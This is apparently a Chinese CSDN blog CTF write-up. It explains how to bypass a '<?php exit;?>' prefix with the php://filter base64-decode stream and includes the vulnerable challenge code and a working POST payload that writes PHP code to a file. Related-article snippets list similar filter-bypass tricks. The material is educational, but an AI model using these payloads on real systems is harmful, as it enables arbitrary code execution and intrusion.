关于php的exit函数的绕过问题

最新推荐文章于 2024-08-10 10:43:13 发布
最新推荐文章于 2024-08-10 10:43:13 发布
阅读量2.8k 收藏 4
点赞数
分类专栏: CTF 文章标签: php exit函数的绕过
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/88958838
版权 
<?php
  show_source(__FILE__);
  $c="<?php exit;?>";
  @$c.=$_POST['c'];
  @$filename=$_POST['file']; 
  if(!isset($filename))                    
  {                                       
    file_put_contents('tmp.php', ''); 
  }                                 
  @file_put_contents($filename, $c);
  include('tmp.php');
?>

例如这个代码不管怎么样你的$c 最开始都有exit 来结束代码
所以后面不管加什么都会直接结束
而最后include(‘tmp.php’) 说明我们需要代码执行或者系统命令执行我们才可以拿到shell
所以我们需要绕过这个exit这个函数

这里我们可以利用php伪协议进行绕过
php://filter/write=convert.base64-decode
因为<?php exit;?>中"<、?、;、>"等符号base64解码时都会被忽略,所以经过base64解码之后变成’phpexit’ 但是这里面只有7个字节 base64 是4个一组解码 所以我们还需要任意添加一个字符如’a’

那么我们构造的poc如下:
c=aPD9waHAgcGhwaW5mbygpOz8+&file=php://filter/write=convert.base64-decode/resource=t.php
在这里插入图片描述

小鱼儿waha
关注
专栏目录
__wakeup绕过版本_PHP__wakeup()方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 1122
​ __wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数大于实际成员数,即可绕过
PHP ctf addslashes,[红日安全]代码审计Day13 - 特定场合下addslashes函数绕过
weixin_33631836的博客
03-17 731
本文由红日安全成员: l1nk3r 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并...
关于<?php exit;?>"的绕过问题
03-18 1008
在Moctf中看到一道题目: <?php show_source(__FILE__); $c="<?php exit;?>"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
php://filter绕过<?php exit();
midi
07-29 395
php://filter绕过<?php exit(); 懒得改版式了,直接贴pdf。 bypass.pdf 晚安
PHP一些函数绕过总结
最新发布
weixin_52230368的博客
08-10 1013
可以引入\f(也就是%0c)在数字前面,来绕过最后那个is_palindrome_number函数,而对于前面的数字判断,因为intval和is_numeric都会忽略这个字符,所以不会影响。同理,intval(” \r\n \t 12″),也会正常返回12。的文字这样输出会出现乱码情况第一个参数是你文本的编码第二个参数是你要转换的文本格式第三个是你要转换的文本使用之后把返回结果赋值给。这里用的是strcmp()函数,这个函数是用于比较字符串的函数,但是倘若他收到一个数组形式的数据时,这个函数将发生错误。
php 死亡绕过
m0_75178803的博客
04-09 487
之类的限制) ,不管后面的语句是什么,都会先执行退出,导致后面的语句不执行,这也叫php死亡退出。base64编码中只包含64个可打印字符,而php在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。运用到一个正则表达式,会把输入进行正则匹配,把内容里不符合条件的,比如说<?base64是四个字符一解密,前面的8个字符解密后会变成6个乱码,后面的正常解密,获得加密之前的语句。因为我们加入了一个a。
php题目exit绕过
weixin_53259175的博客
06-28 473
>、空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。众所周知,base64编码中只包含64个可打印字符,而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。是可以控制协议的,即可用使用php://filter尝试,使用php://filter流的base64-decode方法解码。执行成功访问创建的文件a.php并未有任何回应,查看创建的文件a.php内容。
绕过 <?PHP exit('Access Denied'); ?> 限制
weixin_34391854的博客
06-10 255
绕过 &lt;?PHP exit('Access Denied'); ?&gt; 限制   &lt;?php $shellcode='PD9waHBpbmZvKCk7Pz4';//   base64_decode &lt;?phpinfo();?&gt; $endstr='s';   $timestamp=$endstr.$shellcode; file_put_contents("...
eval长度限制绕过 && PHP5.6新特性
m0_59049258的博客
08-22 732
死亡绕过代码:exit.phpphpphp exit;>';?查看后台,确实生成了文件,但是文件内容拼接在exit后面。程序遇见即结束。将绕过这种限制的行为称为死亡绕过。我们想要绕过就需要将
PHP代码层防护与绕过.pdf
04-22
- **大小写绕过**: `strpos()` 函数对大小写敏感,可以利用这一点通过修改输入的大小写来绕过过滤。 - 示例: `id=1 AND 1=1 UNION SELECT 1,2,3 FROM admin` ##### 2.2 使用`stripos`过滤关键字 **PHP过滤代码...
php绕过管理员登录,EspCMS后台登录绕过漏洞再利用
weixin_34570241的博客
03-17 775
之前4月13日在360的漏洞平台提交过一次,当时给出了能计算出db_pscode的利用工具。db_pscode是安装的时候随机生成的一个字符串常量,保存在配置文件里。4月22日,官方发布了新版本,改进了程序安装时候生成db_pscode的方法,"修复了"该漏洞。其实官方只是防住了当时的那个exp,并没有从根本上防住漏洞。22日之前是32位的md5hash字符串,这次长度变的不固定可以是1-39位的...
php://filter绕过死亡exit
leekos的博客,分享web安全相关知识~
07-30 1050
最近写了一道反序列化的题,其中有一个需要通过去绕过死亡exit()的小trick,这里通过一道题目来讲解。
exit()和_exit()两个函数的区别
happylzs2008的专栏
10-27 294
https://blog.csdn.net/kang___xi/article/details/80545510 exit()和_exit()这两个函数都是用于函数退出,但这两者有一些细微的差别,在exit()函数里会调用_exit()函数。下面来看看exit()的函数代码大概: void exit(int status) { while(_exit_funcs != NULL) ...
绕过 <?PHP exit(’Access Denied’); ?> 限制
paulfzm的专栏
01-28 170
绕过 &lt;?PHP exit(’Access Denied’); ?&gt; 限制 &lt;?php $shellcode=’PD9waHBpbmZvKCk7Pz4’;//   base64_decode &lt;?phpinfo();?&gt; $endstr=’s’; $timestamp=$endstr.$shellcode; file_put...
ctfshow-web入门117(绕过exit头部限制)
qq_44657899的博客
10-27 1771
源码如下: <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_match('/ht
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1804
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
ctf题目php文件上传如何绕过_BUUCTF web 刷几道菜鸡能做的题
weixin_28862967的博客
01-14 1000
[WUSTCTF2020]CV Maker(文件上传)1、注册,登录,上传图片马,用bp抓包后将filename后缀改为php,连上蚁剑。[极客大挑战 2019]Havefun(简单代码审计)[极客大挑战 2019]Knife1、直接连上蚁剑。果真白给的shell。[极客大挑战 2019]EasySQL(万能密码)username=‘admin‘or 1=1#‘ and password=‘随便写...
PHP代码审计(死亡退出)
qq_36609913的博客
02-13 1622
代码: &lt;?php show_source(__FILE__); $c="&lt;?php exit;?&gt;"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
Moctf死亡退出Write up
ChanCherry的博客
07-16 848
一开始就看到了源码,萌新表示大致看得懂什么意思,大致分析下: 第四行@c.=c.=c.=_POST[‘c’]; //@为屏蔽错误不显示在浏览器界面,POST[′c′]是以post的方式获取字符串类型的变量c,&quot;.=&quot;表示变量c会与之前变量中的&lt;?phpexit;?&gt;进行字符串连接。很显然题目需要我们以post的方式提交变量c使&amp...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值